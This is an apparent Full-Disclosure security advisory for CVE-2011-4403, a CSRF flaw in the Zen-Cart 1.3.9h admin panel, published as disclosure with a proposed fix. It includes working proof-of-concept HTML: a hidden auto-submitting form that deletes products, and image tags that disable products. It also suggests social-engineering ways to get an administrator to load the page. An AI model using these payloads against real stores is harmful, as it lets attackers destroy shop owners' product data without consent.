[Full-disclosure] Zen-Cart Admin CSRF/XSRF - Delete / Disable Products | UPS-2011-0018 | CVE-2011-4403



*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from
within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
* Social Engineer an admin user (trick them)
* Packet Capture
* Email headers
* Invoice print out
* * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
* This is public information
4. The attack must then social engineer (trick them) into loading the page
* Email with images
* Post a forum topic with the images
* Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm";
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5
"/>

Proposed Solution

* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: [Full-Disclosure] Reacting to a server compromise
    ... I also know that the attacker performed a UDP flood on some ... and a new admin account. ... Judging from the date of the trojan files, they only had control for 2-3 ... will start with a report to CERT, ...
    (Full-Disclosure)
  • DeskPRO Admin Panel Multiple HTML Injections
    ... DeskPRO Admin Panel Multiple HTML Injections ... An attacker may leverage this issue to have arbitrary script code execute ... Such attacks can be crafted were Attacker may inject cod ewere it willsend the Admins ...
    (Bugtraq)
  • Re: IBM Websphere Portal pentest
    ... Websphere, unless they fixed it. ... I managed to get the admin password to the portal. ... I'm trying to build a case on what an attacker can do once he gets admin ... InfoSec Institute ...
    (Pen-Test)
  • IBM Websphere Portal pentest
    ... I managed to get the admin password to the portal. ... access control on the Portal's resources served by an IBM HTTP Server ... with LDAP user directory. ... I'm trying to build a case on what an attacker can do once he gets admin ...
    (Pen-Test)